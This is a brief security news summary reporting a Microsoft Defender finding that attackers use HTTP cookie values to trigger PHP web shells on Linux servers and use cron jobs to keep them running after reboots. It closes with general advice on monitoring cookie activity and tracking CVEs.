Threat actors have been found to be using HTTP cookies as a means of controlling PHP-based web shells on Linux servers, allowing them to achieve remote code execution.
This new technique, discovered by the Microsoft Defender Security Research Team, involves using threat actor-supplied cookie values to gate execution, rather than relying on URL parameters or request bodies.
The use of cookies as a control channel for web shells is a significant development, as it allows attackers to maintain persistence on compromised systems while evading detection.
By leveraging cron jobs on Linux servers, these web shells can persist even after a system reboot, making them a formidable threat to system security.
The Microsoft Defender Security Research Team’s findings highlight the need for increased vigilance and monitoring of HTTP cookie activity to detect and prevent such attacks.
As the threat landscape continues to evolve, it is essential for organizations to stay informed about the latest threats and vulnerabilities, such as CVEs related to PHP and Linux, to ensure the security of their systems and data.
Source: Original Article
